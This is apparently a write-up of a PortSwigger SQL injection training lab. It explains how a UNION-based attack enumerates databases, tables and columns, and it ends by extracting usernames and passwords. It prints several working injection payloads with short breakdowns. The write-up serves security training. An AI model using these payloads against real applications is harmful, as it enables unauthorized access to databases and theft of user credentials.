SQL injection UNION attack, retrieving data from other tables

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

Level: Practitioner

  • In this lab I will show how to enumerate databases, tables and columns using a UNION-based attack.

  • First, we need to know how many columns the original query returns, because the UNION SELECT must return the same number.

  • You can do this as shown in the following image, or you can use ORDER BY instead.

  • To get all the database names, use the following payload.

  • ' Union select schema_name,NULL from information_schema.schemata-- -

A simple breakdown of what this expression means:

  • information_schema.schemata - list me the DB names.

  • schema_name - get me back the DB names.

  • Now that we know the DB name that we want, we need to get the names of the tables.

  • Use the following payload to retrieve the names of the tables.

  • ' Union select table_name,NULL from information_schema.tables where table_schema = 'DB_NAME' -- -

Breakdown

  • information_schema.tables - list me all the tables.

  • table_name - get me back the name of the tables.

  • table_schema - name of the database we want to use.

  • Now we use the following payload to get the columns of the table that we want.

  • ' Union select column_name,NULL from information_schema.columns where table_name = 'TABLE_NAME' -- -

Breakdown

  • column_name - get me the names of the columns.

  • information_schema.columns - list me all the columns.

  • table_name - selects the table that we want to get info from.

  • Now that we know the columns that we want to extract data from, I like to use the following.

  • ' Union select NULL,username||':'||password from users -- -

Breakdown

  • username||':'||password - concatenates both values into a single column, which presents the data in a more readable way.

*Important*

If you don't understand the SQL logic and how to write these queries, I recommend practicing in a virtual lab where you build the DB and break it yourself.
